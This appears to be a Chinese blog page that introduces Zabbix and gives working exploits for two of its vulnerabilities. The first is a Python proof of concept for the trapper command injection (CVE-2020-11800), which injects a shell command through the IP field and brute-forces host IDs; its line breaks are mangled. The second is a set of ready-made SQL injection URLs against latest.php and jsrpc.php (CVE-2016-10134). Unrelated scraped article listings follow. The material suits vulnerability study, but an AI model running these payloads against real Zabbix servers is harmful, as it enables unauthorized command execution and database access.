Zabbix

  1. 是什么?
    免费的、企业级的分布式开源、C/S架构、监控众多网络参数和服务器的软件。
    Zabbix基本原理
  2. 存在的漏洞?

Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

zabbix latest.php SQL注入漏洞(CVE-2016-10134)

  1. 漏洞原理。

Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

:在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令

修改CVE-2017-2824的POC中的IP字段,构造新的POC:

import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)

当查看到如下结果时,则说明命令执行成功:


进入server容器,可见/tmp/success2已成功创建:

zabbix latest.php SQL注入漏洞(CVE-2016-10134)

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

将这16个字符作为sid的值,访问http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0),可见成功注入:


这个漏洞也可以通过jsrpc.php触发,且无需登录:http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):

软件漏洞之Zabbix相关推荐

  1. 去年黑客用的未知软件漏洞数量增长一倍 创下纪录

    黑客的技术正变得愈加先进 北京时间4月12日消息,据路透社报道,全球最大安全软件厂商赛门铁克发布的最新报告显示,去年黑客使用的此前未知软件漏洞数量增长了一倍以上,再次表明网络犯罪和网络间谍活动的技术正 ...

  2. 漏洞战争软件漏洞分析精要 学习笔记

    (拖延症越来越严重) 书非借不能读也 , 时间匆匆 , 没有读完 也是由于自己 , 刚刚起步吧 阅读还是有一定难度 所以 , 只能做个简简单单的总结了 对常见软件漏洞的分类和简介 常见漏洞列表 栈溢出 ...

  3. RiskSense Spotlight:全球知名开源软件漏洞分析报告

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 RiskSense 公司最近发布了关于全球当前知名开源软件 (OSS) 的漏洞分析报告.奇安信代码卫士团队编译如下.   摘要 开源软 ...

  4. 开源软件漏洞升级步骤

    开源软件最常见的就是各式各样的漏洞,为了产品的健壮性以及客户安全,我们必须时刻警醒! 1.漏洞扫描与检测 针对开源软件需要经常进行漏洞扫描检测,可以通过一些信息库进行检测,比如:国家信息安全漏洞库或者 ...

  5. NVD软件漏洞数据处理及分类方法总结

    目录 一.前言 二.软件漏洞数据分析 三.软件漏洞分类实验流程 四.软件漏洞文本预处理 五.软件漏洞文本表示方法 六.软件漏洞分类模型构建 七.软件漏洞分类实验结果与分析 八.总结 一.前言 本人基于 ...

  6. 0day安全:软件漏洞分析技术(第2版)

    0day安全:软件漏洞分析技术(第2版) 基本信息 作者:王清   张东辉   周浩   王继刚   赵双 丛书名:安全技术大系 出版社:电子工业出版社 ISBN:9787121133961 上架时间 ...

  7. 机器学习:软件漏洞分析

    Software Vulnerability Analysis and Discovery Using Machine-Learning and Data-Mining Techniques: A S ...

  8. (5/8 软件漏洞攻击利用技术)如何成为一名黑客(网络安全从业者)——网络攻击技术篇

    1.软件漏洞的概念与分类 软件漏洞是指计算机系统中的软件在具体的实现.运行.机制.策略上存在的缺陷或脆弱点.攻击者可以利用漏洞获得计算机的权限. 软件漏洞按照软件类别不同,可以分为操作系统服务程序漏洞 ...

  9. 书评第003篇:《0day安全:软件漏洞分析技术(第2版)》

    本书基本信息 丛书名:安全技术大系 作者:王清(主编),张东辉.周浩.王继刚.赵双(编著) 出版社:电子工业出版社 出版时间:2011-6-1 ISBN:9787121133961 版次:1 页数:7 ...

最新文章

  1. java如何追加写入txt文件
  2. python装饰器实例-Python装饰器简单用法实例小结
  3. 使用java的HttpClient实现抓取网页数据
  4. C++中随机函数rand()和srand()的用法
  5. Excel 数据有效性,怎么提示指定的命名区域不存在?
  6. 必备快速定位排查问题命令
  7. 【DP】【树状数组】方伯伯的玉米田/优美玉米(luogu 3287/金牌导航 数据结构优化DP-5)
  8. 【bzoj题解】1001 狼抓兔子
  9. Bootstrap 使用Less变量
  10. 32mU盘 Linux x86,我有一个32M的U盘,大家帮我想想这个东西如何利用?
  11. SpringCloud工作笔记041---com.fasterxml.jackson.databind.ObjectMapper的使用
  12. Eclipse用法和技巧八:自动添加try/catch块1
  13. 主流HTML5游戏框架的分析和对比(Construct2、ImpactJS、CreateJS、Cocos2d-html5……) .
  14. python locale.setlocale_语言环境.setlocale(LC_NUMERIC):如何使其在Windows上运行
  15. golang模拟抢票
  16. 微信群对服务器的要求,微信群运营必看:运营微信群必做的7点要求
  17. 程序开发必备利器—英特尔Core i5开发机
  18. Python基础知识笔记
  19. 关于SQL的一点学习
  20. Mysql体系构架详解——内存

热门文章

  1. 关于牛顿迭代求根的笔记
  2. Interfacing with Pixhawk using the NSH
  3. 如何 repack 一个RPM包
  4. 应用计算机测定线性电阻伏安特性实验器材,实验一电路元件伏安特性的测试
  5. 提高APP冷启动速度小结
  6. Python深度学习婴儿啼哭声分类识别,测试集准确率67.5%
  7. Mini CFA 考试练习题 Microeconomics
  8. WSO2 文件上传 (CVE-2022-29464)漏洞复现
  9. 论文阅读:Regularizing Deep Networks with Semantic Data Augmentation
  10. 利用Python实现scissors-rock-paper-lizard-Spock小游戏